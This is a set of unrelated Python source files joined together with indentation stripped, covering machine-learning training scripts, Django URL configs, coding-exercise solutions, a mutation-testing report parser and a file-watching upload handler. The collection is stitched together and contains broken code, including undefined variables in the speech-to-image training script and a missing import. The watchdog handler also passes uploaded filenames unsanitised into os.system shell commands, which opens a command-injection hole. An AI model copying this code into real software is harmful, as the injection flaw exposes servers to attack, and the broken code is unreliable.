self.ca.set_pv_value("{}:CURRENT:SP".format(flipper), param)
self._assert_params("{:.1f}".format(param))
self._assert_mode("static")
@skip_if_recsim("State of device not simulated in recsim")
def test_WHEN_steps_mode_set_THEN_parameters_reflected_and_mode_is_steps(self):
param = "[some, random, list, of, data]"
self.ca.set_pv_value("{}:CURRENT_STEPS:SP".format(flipper), param)
self._assert_params(param)
self._assert_mode("steps")
@skip_if_recsim("State of device not simulated in recsim")
def test_WHEN_analytical_mode_set_THEN_parameters_reflected_and_mode_is_analytical(self):
param = "a long string of parameters which is longer than 40 characters"
self.ca.set_pv_value("{}:CURRENT_ANALYTICAL:SP".format(flipper), param)
self._assert_params(param)
self._assert_mode("analytical")
@skip_if_recsim("State of device not simulated in recsim")
def test_WHEN_file_mode_set_THEN_parameters_reflected_and_mode_is_file(self):
param = r"C:\some\file\path\to\a\file\in\a\really\deep\directory\structure\with\path\longer\than\40\characters"
self.ca.set_pv_value("{}:FILENAME:SP".format(flipper), param)
self._assert_params(param)
self._assert_mode("file")
@parameterized.expand(parameterized_list(["MODE", "COMPENSATION", "PARAMS"]))
@skip_if_recsim("Recsim cannot test disconnected device")
def test_WHEN_device_is_disconnected_THEN_pvs_are_in_invalid_alarm(self, _, pv):
self.ca.assert_that_pv_alarm_is("{}:{}".format(flipper, pv), self.ca.Alarms.NONE)
with self._lewis.backdoor_simulate_disconnected_device():
self.ca.assert_that_pv_alarm_is("{}:{}".format(flipper, pv), self.ca.Alarms.INVALID)
# Assert alarms clear on reconnection
self.ca.assert_that_pv_alarm_is("{}:{}".format(flipper, pv), self.ca.Alarms.NONE)
|
import pyaudio
cache = "cache/"
rate = 44100
channels = 1
format = pyaudio.paInt16
chunk = 1024
rec_seconds = 5 |
import json
import os
from collections import defaultdict
from src import model
class MutantOperator:
operators = {}
@classmethod
def reset_operators(cls):
cls.operators = {}
def __init__(self, adict):
self.name: str = adict["name"]
self.description: str = adict["description"]
if self.name in self.operators:
msg = (
f"Found duplicate operator name! "
f"{self.name} found, but got already {self.operators[self.name]}"
)
raise ValueError(msg)
else:
self.operators[self.name] = self
@classmethod
def find_by_name(cls, name: str):
return cls.operators[name]
def __repr__(self):
return f"MutantOperator(name={self.name}, description={self.description})"
class Mutant(model.Mutant):
counter = defaultdict(int)
@classmethod
def reset_counter(cls):
cls.counter = defaultdict(int)
@property
def hash_tuple(self) -> tuple:
return self._hash_tuple + (self._count,)
@property
def _hash_tuple(self) -> tuple:
return self.line, self.operator.name
def __init__(self, adict):
lines = adict["lines"]
operators = adict["operators"]
points = adict["points"]
assert all(len(thelist) == 1 for thelist in (lines, operators, points))
line, operator, points = lines[0], operators[0], points[0]
super().__init__(line=int(line))
self.points: int = points
self.operator = MutantOperator.find_by_name(operator)
# fix different mutations but with same line
# and description with a counter
thehash = hash(self._hash_tuple)
self._count = Mutant.counter[thehash]
Mutant.counter[thehash] += 1
def __str__(self):
if self.original_line != self.line:
s = f" (original: {self.original_line})"
else:
s = ""
s = f"Mutant at line {self.line}{s} with"
s += f" {self.points} points and"
s += f" operator {self.operator}"
return s
class Report(model.Report):
def __init__(self, result_fp: [str, os.PathLike], classname: str):
self.result_fp = result_fp
self.classname = classname
self.operators = None
self.name = None
self.total_mutants_count = None
self.killed_mutants_count = None
self.live_mutants_count = None
self.live_mutants = None
def makeit(self):
# reset counter when we create the report
Mutant.reset_counter()
with open(self.result_fp) as f:
result = json.load(f)
# instantiate operators to use them in Mutants
self.operators = [MutantOperator(adict) for adict in result["operators"]]
classdict = [
thedict
for thedict in result["classes"]
if self.classname == thedict["name"]
]
if not classdict:
raise ValueError(
f"{self.classname} not found in classes; file: {self.result_fp}"
)
elif len(classdict) > 1:
raise ValueError(f"{self.classname} found 2+ times; file: {self.result_fp}")
else:
classdict = classdict[0]
self.name = classdict["name"]
self.total_mutants_count = classdict["mutantsCount"]
self.killed_mutants_count = classdict["mutantsKilledCount"]
self.live_mutants_count = self.total_mutants_count - self.killed_mutants_count
self.live_mutants = [Mutant(mdict) for mdict in classdict["notKilledMutant"]]
# at the end of execution, reset mutant operator dictionary
MutantOperator.reset_operators()
def get_live_mutants(self):
return self.live_mutants
def get_killed_mutants(self):
return []
def get_killed_mutants_count(self):
return self.killed_mutants_count
def get_mutants_count(self):
return self.total_mutants_count
def __repr__(self):
s = f"CLASS {self.name}\n"
s += f"Total mutants: {self.total_mutants_count} -> "
s += f"Killed: {self.killed_mutants_count}, Live: {self.live_mutants_count}"
if self.live_mutants_count > 0:
s += "\nLIVE MUTANTS:\n"
s += "\n".join(
repr(mutant)
for mutant in sorted(self.live_mutants, key=lambda x: x.line)
)
return s
|
from pyspark.sql import SparkSession
from pyspark.sql import Row
from pyspark.sql import functions as func
spark = SparkSession.builder.appName("FriendsByAge").getOrCreate()
lines = spark.read.option("header", "true").option("inferSchema", "true").csv("file:///scourse/fakefriends-header.csv")
# Select only age and numFriends columns, we don't need to show it, we just need to assign the results to a variable
friendsByAge = lines.select("age", "friends")
# From friendsByAge we group by "age" and then compute average
friendsByAge.groupBy("age").avg("friends").show()
# Sorted
friendsByAge.groupBy("age").avg("friends").sort("age").show()
# Formatted more nicely
# In order to aggregate or use special functions such as round and avg together you need to use a special function called .agg
# in other words, .agg allows us to clump together multiple commands on an aggregated group results
friendsByAge.groupBy("age").agg(func.round(func.avg("friends"), 2)).sort("age").show()
# With a custom column name
# we name the column name: friends_avg with the value from .alias('friends_avg)
friendsByAge.groupBy("age").agg(func.round(func.avg("friends"), 2)
.alias("friends_avg")).sort("age").show()
spark.stop()
|
""" MULTIVARIATE TIME SERIES SINGLE POINT FORECAST
----------------------------------------------
Implementation of a lstm recurrent neural network for multivariate time series forecasting of a single point in the future.
This script uses a weather time series dataset, which contains 14 features collected every 10 minutes between 2009 and 2016.
Code reference: https://www.tensorflow.org/tutorials/structured_data/time_series#single_step_model
"""
# -------------------------------------------------------------------------------
# 0. IMPORT LIBRARIES
# -------------------------------------------------------------------------------
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import tensorflow as tf
# Set the seed
tf.random.set_seed(13)
# -------------------------------------------------------------------------------
# 1. PREPARE THE DATA
# -------------------------------------------------------------------------------
# Import the dataset
climate = pd.read_csv('climate dataset/extracted/jena_climate_2009_2016.csv')
print('-'*96, '\n', climate.head())
# Select three features
multi_data = climate[['p (mbar)', 'T (degC)', 'rho (g/m**3)']]
multi_data.index = climate['Date Time']
print('-'*96, '\n', multi_data.head())
multi_data = multi_data.values
# Standardize the features using the parameters of the training set
train_split = 300000
multi_train_mean = multi_data[:train_split].mean(axis=0)
multi_train_std = multi_data[:train_split].std(axis=0)
multi_data_std = (multi_data - multi_train_mean) / multi_train_std
# Create time series of features and targets for train and valid subsets
def multi_dataset_generator(dataset, target, start_index, end_index, history_len, target_len, step, single_step):
end_index = len(dataset) - target_len if end_index is None else end_index
data = []
labels = []
for i in range(start_index, end_index - history_len):
# range(start_index, start_index + history_len) | range(end_index - 1 - history_len, end_index - 1)
history_index = range(i, i + history_len, step)
data.append(dataset[history_index])
if single_step:
# (start_index + history_len + target_len) | (end_index - 1 + target_len)
labels.append(target[i + history_len + target_len])
else:
# (start_index + history_len: start_index + history_len + target_len) | (end_index - 1: end_index - 1 + target_len)
labels.append(target[i + history_len: i + history_len + target_len])
return np.array(data), np.array(labels)
history_len = 720
target_len = 72
step = 6
multi_single_x_train_std, multi_single_y_train_std = multi_dataset_generator(multi_data_std, multi_data_std[:, 1], 0, train_split, history_len, target_len, step, single_step=True)
multi_single_x_valid_std, multi_single_y_valid_std = multi_dataset_generator(multi_data_std, multi_data_std[:, 1], train_split, None, history_len, target_len, step, single_step=True)
# Create the train and valid subsets containing tuples of size (120x3) and (1,);
# then cache and shuffle the dataset of tuples and create batches with 256 tuples each
batch_size = 256
multi_ds_train_std = tf.data.Dataset.from_tensor_slices((multi_single_x_train_std, multi_single_y_train_std))
multi_ds_train_std = multi_ds_train_std.cache().shuffle(10000).batch(batch_size).repeat()
multi_ds_valid_std = tf.data.Dataset.from_tensor_slices((multi_single_x_valid_std, multi_single_y_valid_std))
multi_ds_valid_std = multi_ds_valid_std.batch(batch_size).repeat()
for batch in multi_ds_train_std.take(1):
array_time_series_of_features = batch[0]
array_of_targets = batch[1]
print('-'*96,
'\nThe dataset is made up of several batches, each containing an array of 256 time series of the features'
'\nand an array of 256 targets. In particular, for each tuple (time series of the features - target) the',
'\ntarget is 72 elements after the last element of the time series of the features.\n',
'\n*** BATCH 0',
'\n -- Tuple 0\n', array_time_series_of_features.numpy()[0], array_of_targets.numpy()[0],
'\n -- Tuple 255\n', array_time_series_of_features.numpy()[255], array_of_targets.numpy()[255])
# -------------------------------------------------------------------------------
# 2. DESIGN THE MODEL
# -------------------------------------------------------------------------------
# Design the lstm recurrent neural network
lstm_model = tf.keras.models.Sequential()
lstm_model.add(tf.keras.layers.LSTM(units=32, return_sequences=False, input_shape=multi_single_x_train_std.shape[-2:]))
lstm_model.add(tf.keras.layers.Dense(1))
# Print the model summary
print('-'*96)
lstm_model.summary()
print('Input shape: (time steps x num features) =', multi_single_x_train_std.shape[-2:],
'\nNote that the batch size is not specified in "input shape"',
'\nNote that the number of batches is irrelevant')
# Compile the model to specify optimizer and loss function
lstm_model.compile(optimizer=tf.keras.optimizers.RMSprop(), loss='mae')
# -------------------------------------------------------------------------------
# 3. TRAIN THE MODEL
# -------------------------------------------------------------------------------
# Train the lstm recurrent neural network
print('-' * 96, '\nInput for training: dataset made up of several batches each containing 256 tuples.')
history = lstm_model.fit(multi_ds_train_std, epochs=10, steps_per_epoch=200, validation_data=multi_ds_valid_std, validation_steps=50)
# Visualize the learning curve
hist = history.history
plt.figure()
plt.plot(hist['loss'], 'b', label='Training loss')
plt.plot(hist['val_loss'], 'r', label='Validation loss')
plt.xlabel('Epoch')
plt.title('Training and validation loss')
plt.legend()
plt.tick_params(axis='both', which='major')
# -------------------------------------------------------------------------------
# 3. MAKE PREDICTIONS
# -------------------------------------------------------------------------------
# Create a function to plot the history, true value and model prediction
def plot_prediction(data, delta, title):
plt.figure()
labels = ['History', 'True Future', 'Model Prediction']
marker = ['.-', 'bx', 'rx']
time_steps = list(range(-data[0].shape[0], 0))
for i, x in enumerate(data):
if i:
plt.plot(delta, data[i], marker[i], label=labels[i])
else:
plt.plot(time_steps, data[i].flatten(), marker[i], label=labels[i])
plt.xlim([time_steps[0], (delta+5)*2])
plt.xlabel('Time-Step')
plt.title(title)
plt.legend()
return plt
# Make a few predictions
print('-' * 96, '\nInput for predicting: dataset made up of several batches each containing 256 tuples.')
for batch in multi_ds_valid_std.take(3):
array_time_series_of_features = batch[0]
array_of_targets = batch[1]
prediction = lstm_model.predict(array_time_series_of_features)
plot = plot_prediction([array_time_series_of_features.numpy()[0][:, 1], array_of_targets.numpy()[0], prediction[0]], 12, 'Simple LSTM model')
# -------------------------------------------------------------------------------
# 5. GENERAL
# -------------------------------------------------------------------------------
# Show plots
plt.show() |
class Solution:
def firstMissingPositive(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
# TODO: Challenge is to find a solution with O(1)
# space complexity and O(N) time complexity
# The following solution is O(N) for time and space
# Space complexity O(N)
m = dict()
# Time complexity O(N)
for num in nums:
m[num] = 1
index = 1
# Time complexity O(N)
while index in m:
index += 1
return index
|
from collections import deque
effects = deque([int(n) for n in input().split(", ")])
casings = deque([int(n) for n in input().split(", ")])
bombs_types = {40: {"name": "Datura Bombs", "quantity": 0},
60: {"name": "Cherry Bombs", "quantity": 0},
120: {"name": "Smoke Decoy Bombs", "quantity": 0}
}
while effects and casings:
res = effects[0] + casings[-1]
if res in bombs_types:
bombs_types[res]["quantity"] += 1
effects.popleft()
casings.pop()
else:
casings[-1] -= 5
bombs_count = [data["quantity"] for _, data in bombs_types.items()]
if bombs_count[0] >= 3 and bombs_count[1] >= 3 and bombs_count[2] >= 3:
print(f"Bene! You have successfully filled the bomb pouch!")
break
else:
print(f"You don't have enough materials to fill the bomb pouch.")
print(f"Bomb Effects: {'empty' if not effects else ', '.join([str(n) for n in effects])}")
print(f"Bomb Casings: {'empty' if not casings else ', '.join([str(n) for n in casings])}")
bombs_types = {data["name"]: data["quantity"] for _, data in sorted(bombs_types.items(), key=lambda x: x[1]["name"])}
[print(f"{n}: {q}") for n, q in bombs_types.items()]
|
from django.urls import path
from . import views
app_name = "account"
urlpatterns = [
path('login', views.acc_login, name="login"),
]
|
from django.conf.urls import *
from django.contrib import admin
from HelloWorld.view import hello
from HelloWorld.testdb import testdb
from HelloWorld import search
from HelloWorld import search2
admin.autodiscover()
urlpatterns = patterns(
"",
(r'^admin/', include(admin.site.urls)),
('^hello/$', hello),
('^testdb/$', testdb),
(r'^search-form/$', search.search_form),
(r'^search/$', search.search),
(r'^search-post/$', search2.search_post),
) |
########################### train.py #######################################
# This code implements the training procedure for the speech-to-image
# retrival model for spoken words and visual objects. To run the code,
# simply modify the data paths for the data and pretrain models to the
# right paths, copy and paste the hg16_hinge_loss function to
# tflearn/objective.py and run the command 'python train.py' on the
# terminal.
#
# Author: Liming Wang
# Date created: May. 23rd, 2018
############################################################################
import numpy as np
import h5py
import tensorflow as tf
import tflearn
import copy
import json
from word_recognition.scnn_train import *
from image_grounding.image_encoder_pretrain import *
DEBUG = False
def cosine_similarity(a_vec, v_vec):
a_norm = tf.nn.l2_normalize(a_vec, dim=0)
v_norm = tf.nn.l2_normalize(v_vec, dim=0)
return tf.nn.relu(tf.matmul(a_norm, v_norm, transpose_b=True))
# Hinge loss function used by Harwath and Glass 2016; y_true is used only to match the pattern of tflearn objective function
'''def hg16_hinge_loss(y_pred, y_true):
with tf.name_scope(None):
return tf.reduce_mean(tf.nn.relu(y_pred - tf.diag(y_pred) + 1)) + tf.reduce_sum(tf.nn.relu(tf.transpose(y_pred) - tf.diag(y_pred) + 1))
'''
def select_retrieval_database(a_feat, v_feat, y, ind2sent_file, im2sent_file, random=False):
with open(im2sent_file, 'r') as f:
im2sent = json.load(f)
with open(ind2sent_file, 'r') as f:
ind2sent = f.read().strip().split('\n')
sent2ind = {s:i for i, s in enumerate(ind2sent)}
selected_indices = []
for im in im2sent.keys():
if random:
n_tokens = len(im2sent[im])
rand_ind = np.random.randint(0, n_tokens)
sent = im2sent[im][rand_ind]
else:
sent = im2sent[im][0]
selected_indices.append(sent2ind[sent])
np.savetxt('experiments/dbid2id_test.txt', selected_indices)
if DEBUG:
print(a_feat.shape)
print(len(selected_indices))
return a_feat[selected_indices], v_feat[selected_indices], y[selected_indices]
def select_negative_examples(grp_list_tr, random=True):
neg_vgg = []
neg_fbank = []
concepts = [c for c, grp in grp_list_tr]
nc = len(concepts)
for c, grp in enumerate(grp_list_tr):
nk = len(grp.items())
# Select negative features
cneg2ind = {c2:i for i,c2 in enumerate(concepts) if not c2 == c}
cneg = [c2 for c2 in concepts if not c2 == c]
inds_neg = np.random.randint(low=0, high=nc-1, size=(nk,))
for i in inds_neg:
grp_neg = grp_list_tr[cneg2ind[cneg[i]]][1]
keys_neg = sorted(grp_neg.keys())
nk_neg = len(keys_neg)
ind_key_neg = np.random.randint(low=0, high=nk_neg-1)
neg_vgg.append(grp_neg[keys_neg[ind_key_neg]]['vgg_penult'])
neg_fbank.append(grp_neg[keys_neg[ind_key_neg]]['fbank'])
return np.array(neg_vgg), np.array(neg_fbank)
def image_encoder(scopes=[None, None], reuse=False):
net = tflearn.input_data(shape=[None, 4096], name=scopes[0])
net = tflearn.fully_connected(net, 512, scope=scopes[1], reuse=reuse)
return net
def retrieve(s_predict, ntop):
dummy = -2
s = copy.deepcopy(s_predict)
n = s.shape[0]
max_k_ids = np.zeros((ntop, n), dtype=int)
for i in range(ntop):
max_ids = np.argmax(s, axis=1)
max_k_ids[i, :] = max_ids
for j in range(n):
s[j, int(max_ids[j])] = dummy
return max_k_ids
def recall_op(s_predict, ntop, save_file=None):
# Calculate the recall score by Finding the top k elements of every column of the similarity matrix in linear time
max_k_ids = retrieve(s_predict, ntop)
dev = max_k_ids - np.linspace(0, n-1, n)
if save_file:
np.savetxt(save_file, max_k_ids.T)
return np.mean(np.min(np.abs(dev), axis=0)==0)
def recall_op_concept(s_predict, y_gt, ntop, save_file=None):
max_k_ids = retrieve(s_predict, ntop)
if DEBUG:
print(max_k_ids.T.shape)
max_lbls = [[np.argmax(y_gt[max_id]) for max_id in max_k_id_row] for max_k_id_row in max_k_ids.T.tolist()]
dev = np.array(max_lbls).T - np.argmax(y_gt, axis=1)
if save_file:
ntx = len(y_gt)
np.savetxt(save_file, np.concatenate([np.expand_dims(np.arange(ntx), axis=1), max_k_ids.T], axis=1))
return np.mean(np.min(np.abs(dev), axis=0)==0)
# Concept-based Latent SCNN
def CLSCNN(nclass, weight_file=None, max_margin=False, sentence=False):
sp_enc = SCNN(0, classify=False, sentence=sentence)
im_enc = image_encoder(scopes=['in_pos', 'fc_im'])
comb_enc = sp_enc * im_enc
net1 = tflearn.fully_connected(comb_enc, nclass, activation='softmax', scope='out1')
net2 = tflearn.fully_connected(sp_enc, nclass, activation='softmax', scope='out2')
# Define the regression layer for sp2im retriever
'''if max_margin:
#accuracy = tflearn.metrics.accuracy
im_enc_neg = image_encoder(scopes=['in_neg', 'fc_im'], reuse=True)
comb_enc_neg = sp_enc * im_enc_neg
net_neg = tflearn.fully_connected(comb_enc, nclass, activation='softmax', scope='out', reuse=True)
net_comb = tflearn.regression([net, net_neg], optimizer='adam', metric=None, learning_rate=1e-5, loss='maxmargin_categorical_crossentropy')
else:'''
accuracy = tflearn.metrics.accuracy_multihot(nhot_max=5)
reg1 = tflearn.regression(net1, optimizer='adam', metric=accuracy, learning_rate=1e-5, loss='categorical_crossentropy')
reg2 = tflearn.regression(net2, optimizer='adam', metric=accuracy, learning_rate=1e-5, loss='categorical_crossentropy')
merge = tflearn.merge([reg1, reg2], mode='concat', axis=1)
if DEBUG:
print('Ok here line 106!')
return tflearn.DNN(merge)
# Concept-based Latent SCNN with cross entropy + max margin loss
def CLSCNN2(nclass, weight_file=None, sentence=True):
sp_enc = SCNN(0, classify=False, sentence=sentence)
im_enc = image_encoder(scopes=['in_pos', 'fc_im'])
comb_enc = sp_enc * im_enc
net1 = tflearn.fully_connected(comb_enc, nclass, activation='sigmoid')
net2 = cosine_similarity(sp_enc, im_enc)
# Define the regression layer for sp2im retriever
accuracy = tflearn.metrics.accuracy_multihot()
reg1 = tflearn.regression(net1, optimizer='adam', metric=accuracy, learning_rate=1e-5, loss='weighted_sigmoid_categorical_crossentropy')
recall = tflearn.metrics.recall(n=1)
reg2 = tflearn.regression(net2, optimizer='adam', metric=recall, learning_rate=1e-5, loss='hg16_hinge_loss')
net = tflearn.merge([reg1, reg2], mode='concat', axis=1)
return tflearn.DNN(net, tensorboard_dir='./experiments/')
def train(data_file, nclass, max_margin=False, hinge_loss=False, sentence=False, sp2im_model=None):
# Load the data from h5 file
h5_feat = h5py.File(data_file)
data_dir = '/'.join(data_file.split('/')[:-1]) + '/'
# split into training and testing set
grp_feat_tr = h5_feat['train']
grp_feat_tx = h5_feat['test']
grp_feat_val = h5_feat['val']
grps_tr = grp_feat_tr.items()
if sentence:
a_feat_tr = np.array(grp_feat_tr['fbank'])
v_feat_tr = np.array(grp_feat_tr['vgg_penult'])
y_tr = np.array(grp_feat_tr['lbl'])
else:
tr_list = [d for c, grp in grps_tr for k, d in grp.items() if k]
tr_list = tr_list[:64]
a_feat_tr = np.array([dset['fbank'] for dset in tr_list])
v_feat_tr = np.array([dset['vgg_penult'] for dset in tr_list])
y_tr = np.array([dset['concept_lbl'] for dset in tr_list])
if DEBUG:
print(a_feat_tr.shape, v_feat_tr.shape, y_tr.shape)
if sentence:
a_feat_tx = np.array(grp_feat_tx['fbank'])
v_feat_tx = np.array(grp_feat_tx['vgg_penult'])
y_tx = np.array(grp_feat_tx['lbl'])
else:
grps_tx = grp_feat_tx.items()
tx_list = [d for c, grp in grps_tx for k, d in grp.items() if k]
tx_list = tx_list[:64]
a_feat_tx = np.array([dset['fbank'] for dset in tx_list])
v_feat_tx = np.array([dset['vgg_penult'] for dset in tx_list])
y_tx = np.array([dset['concept_lbl'] for dset in tx_list])
if sentence:
a_feat_val = np.array(grp_feat_val['fbank'])
v_feat_val = np.array(grp_feat_val['vgg_penult'])
y_val = np.array(grp_feat_val['lbl'])
else:
grps_val = grp_feat_val.items()
val_list = [d for c, grp in grps_val for k, d in grp.items() if k]
val_list = val_list[:64]
a_feat_val = np.array([dset['fbank'] for dset in val_list])
v_feat_val = np.array([dset['vgg_penult'] for dset in val_list])
y_val = np.array([dset['concept_lbl'] for dset in val_list])
# Change the features to the right shape
if DEBUG:
print(a_feat_tx.shape, v_feat_tx.shape, y_tx.shape)
a_feat_tr = np.transpose(np.expand_dims(a_feat_tr, 1), [0, 1, 3, 2])
a_feat_tx = np.transpose(np.expand_dims(a_feat_tx, 1), [0, 1, 3, 2])
a_feat_val = np.transpose(np.expand_dims(a_feat_val, 1), [0, 1, 3, 2])
v_feat_tr = np.squeeze(v_feat_tr, axis=1)
v_feat_tx = np.squeeze(v_feat_tx, axis=1)
v_feat_val = np.squeeze(v_feat_val, axis=1)
# Initialize the sp2im retriever
tf.reset_default_graph()
g1 = tf.Graph()
# Train for 20 epochs
nep = 50
batch_size = 128
ntr = a_feat_tr.shape[0]
with g1.as_default():
if not max_margin:
if not hinge_loss:
model_sp2im = CLSCNN(nclass=nclass, sentence=sentence)
else:
model_sp2im = CLSCNN2(nclass=nclass, sentence=sentence)
if sp2im_model:
model_sp2im.load(sp2im_model)
if not hinge_loss:
model_sp2im.fit([a_feat_tr, v_feat_tr], [y_tr, y_tr], n_epoch=nep, batch_size=batch_size, validation_set=([a_feat_val, v_feat_val], [y_val, y_val]), shuffle=True, show_metric=True)
model_sp2im.save('sp2im_wrd_model_tflearn{}'.format(time.strftime("-%y-%m-%d-%H", time.localtime())))
else:
for i in range(5):
a_feat_tr_sample, v_feat_tr_sample, y_tr_sample = select_retrieval_database(a_feat_tr, v_feat_tr, y_tr, ind2sent_file=data_dir+'ind2sent_train_cleanup.txt', im2sent_file=data_dir+'im2sent_train.json', random=True)
a_feat_val_sample, v_feat_val_sample, y_val_sample = select_retrieval_database(a_feat_val, v_feat_val, y_val, ind2sent_file=data_dir+'ind2sent_val_cleanup.txt', im2sent_file=data_dir+'im2sent_val.json', random=True)
if DEBUG:
print(a_feat_tr_sample.shape, v_feat_tr_sample.shape, y_tr_sample.shape)
model_sp2im.fit([a_feat_tr_sample, v_feat_tr_sample], [y_tr_sample, y_tr_sample], n_epoch=nep, batch_size=batch_size, validation_set=([a_feat_val_sample, v_feat_val_sample], [y_val_sample, y_val_sample]), shuffle=True, show_metric=True)
model_sp2im.save('sp2im_wrd_model_tflearn{}'.format(time.strftime("-%y-%m-%d-%H", time.localtime())))
else:
model_sp2im = CLSCNN(nclass=nclass, max_margin=True)
iv_feat_tr_neg, a_feat_tr_neg = select_negative_examples(grps_tr)
v_feat_val_neg, v_feat_val_neg = select_negative_examples(grps_val)
# Train for 20 epochs
model_sp2im.fit([a_feat_tr, v_feat_tr, v_feat_tr_neg], y_tr, n_epoch=nep, batch_size=batch_size, validation_set=([a_feat_val, v_feat_val, v_feat_val_neg], y_val), shuffle=True, show_metric=False)
model_sp2im.save('sp2im_wrd_model_maxmargin_tflearn{}'.format(time.strftime("-%y-%m-%d-%H", time.localtime())))
if __name__ == "__main__":
#train('/home/lwang114/data/flickr/flickr8k_sp2im_feats/flickr_wrd_fbank_penult_70concepts.h5', nclass=70, max_margin=False)
#train('/home/lwang114/spring2018/sp2im_word/data/flickr_sentence_segment_807_2018/flickr_sent_fbank_penult_segmented2.h5', nclass=70, hinge_loss=True, sentence=True) #sp2im_model='/home/lwang114/spring2018/sp2im_word/sp2im_wrd_model_tflearn-18-07-15-17')
train('/home/lwang114/spring2018/sp2im_word/data/flickr_sentence/flickr_sent_fbank_penult_order.h5', nclass=70, hinge_loss=True, sentence=True)
|
import sys
import time
import logging
from watchdog.observers import Observer
from watchdog.events import FileSystemEventHandler
import socket
import os
IP = "127.0.0.1"
Port = 8051
class eventHandler(FileSystemEventHandler):
"""Logs all the events captured."""
def on_created(self, event):
# print (event.src_path)
trimmedsrc = event.src_path[2:]
extension = trimmedsrc.split(".")
# print (trimmedsrc, extension[-1])
if extension[-1] == "png":
# print ("image uploaded\n")
# run matlab script
command = "matlab -nodisplay -nosplash -r \"inflator('./imageUploads/{0}.png', './tempObj/{0}.obj');exit;\"".format(extension[0].split('/')[-1])
# print ("executing: ", command)
os.system(command)
command = "cp ./tempObj/{0}.obj ./objDownloads/{0}.obj;".format(extension[0].split('/')[-1])
os.system(command)
# if extension[-1] == "obj":
# sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# sock.sendto(trimmedsrc, (IP, Port))
# sock.close()
# print("Sent " + trimmedsrc)
# logging.info("Created %s: %s", what, event.src_path)
if __name__ == "__main__":
logging.basicConfig(
# filename = "log.txt",
# filemode = "a",
level=logging.INFO,
format='%(asctime)s - %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
path = sys.argv[1] if len(sys.argv) > 1 else '.'
# event_handler = LoggingEventHandler()
handler = eventHandler()
observer = Observer()
observer.schedule(handler, path, recursive=True)
observer.start()
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
observer.stop()
observer.join()
|
import subprocess
class SubprocessWrapper(object):
VERBOSE = False
def __init__(self, arguments, working_directory=None, require_out=False, require_log=False):
assert isinstance(arguments, list) or isinstance(arguments, str)
assert require_out != require_log or require_out is False
if isinstance(arguments, str):
arguments = arguments.split(' ')
assert len(arguments) > 0
self.arguments = arguments
self.require_out = require_out
log = require_log or SubprocessWrapper.VERBOSE
stdout = None if log and not require_out else subprocess.PIPE
stderr = None if log and not require_out else subprocess.PIPE
self.process = subprocess.Popen(arguments, stdout=stdout, stderr=stderr, cwd=working_directory)
self.code = 0
def call(self):
out, err = self.process.communicate()
self.code = self.process.returncode
if self.require_out:
return self.code, out.decode(), err.decode()
return self.code
|
import tensorflow as tf
from models import BaseModel
class BertClassifier(BaseModel):
def __init__(self,
bert_config,
sequence_length,
num_classes,
initializer='glorot_uniform',
output='logits',
dropout_rate=0.1,
**kwargs):
super().__init__(**kwargs)
self.bert_config = bert_config
self._config = {
'bert_config': bert_config,
'sequence_length': sequence_length,
'num_classes': num_classes,
'initializer': initializer,
'output': output,
}
self._encoder_layer = self._get_transformer_encoder(bert_config, sequence_length)
self._cls_dropout = tf.keras.layers.Dropout(rate=dropout_rate)
self._logits_layer = tf.keras.layers.Dense(
num_classes,
activation=None,
kernel_initializer=initializer,
name='predictions/transform/logits')
self._encoder_layer.build([[None, self._config["sequence_length"]], [None, self._config["sequence_length"]],
[None, self._config["sequence_length"]]])
self._logits_layer.build([None, self.bert_config.hidden_size])
def call(self, inputs):
inputs = [tf.cast(inputs["input_word_ids"], tf.int32), tf.cast(inputs["input_mask"], tf.int32),
tf.cast(inputs["input_type_ids"], tf.int32)]
_, cls_output = self._encoder_layer(inputs)
cls_output = self._cls_dropout(cls_output)
logits = self._logits_layer(cls_output)
predictions = tf.keras.layers.Activation(tf.nn.log_softmax)(logits)
if self._config['output'] == 'logits':
return logits
elif self._config['output'] == 'predictions':
return predictions
raise ValueError(('Unknown `output` value "%s". `output` can be either "logits" or '
'"predictions"') % self._config['output'])
|
def get_next_target(s):
start_link = s.find('<a href=')
start_quote = s.find('"',start_link)
end_quote = s.find('"',start_quote+1)
url = s[start_quote+1:end_quote]
return url , end_quote
print get_next_target('<a href= "www.hello.com" >') |
### copy from jianjin
import random
import os.path
import logging
import os
from copy import copy
import numpy as np
import h5py
import pandas as pd
from datetime import datetime
import time
logger = logging.getLogger(__name__)
def string2timestamp(strings, T=48):
timestamps = []
time_per_slot = 24.0 / T
num_per_T = T // 24
for t in strings:
year, month, day, slot = int(t[:4]), int(t[4:6]), int(t[6:8]), int(t[8:])-1
timestamps.append(pd.Timestamp(datetime(year, month, day, hour=int(slot * time_per_slot),
minute=(slot % num_per_T) * int(60.0 * time_per_slot))))
return timestamps
class STMatrix(object):
"""docstring for STMatrix"""
def __init__(self, data, timestamps, T=48, CheckComplete=True):
super(STMatrix, self).__init__()
assert len(data) == len(timestamps)
self.data = data
self.timestamps = timestamps
self.T = T
self.pd_timestamps = string2timestamp(timestamps, T=self.T)
if CheckComplete:
self.check_complete()
# index
self.make_index()
def make_index(self):
self.get_index = dict()
for i, ts in enumerate(self.pd_timestamps):
self.get_index[ts] = i
def check_complete(self):
missing_timestamps = []
offset = pd.DateOffset(minutes=24 * 60 // self.T)
pd_timestamps = self.pd_timestamps
i = 1
while i < len(pd_timestamps):
if pd_timestamps[i-1] + offset != pd_timestamps[i]:
missing_timestamps.append("(%s -- %s)" % (pd_timestamps[i-1], pd_timestamps[i]))
i += 1
for v in missing_timestamps:
print(v)
assert len(missing_timestamps) == 0
def get_matrix(self, timestamp):
return self.data[self.get_index[timestamp]]
def save(self, fname):
pass
def check_it(self, depends):
for d in depends:
if d not in self.get_index.keys():
return False
return True
def create_dataset(self, len_closeness=20):
"""current version
"""
# offset_week = pd.DateOffset(days=7)
offset_frame = pd.DateOffset(minutes=24 * 60 // self.T)
XC = []
timestamps_Y = []
depends = [range(1, len_closeness+1)]
i = len_closeness
while i < len(self.pd_timestamps):
Flag = True
for depend in depends:
if Flag is False:
break
Flag = self.check_it([self.pd_timestamps[i] - j * offset_frame for j in depend])
if Flag is False:
i += 1
continue
x_c = [np.transpose(self.get_matrix(self.pd_timestamps[i] - j * offset_frame), [1, 2, 0]) for j in depends[0]]
if len_closeness > 0:
XC.append(np.stack(x_c, axis=0))
timestamps_Y.append(self.timestamps[i])
i += 1
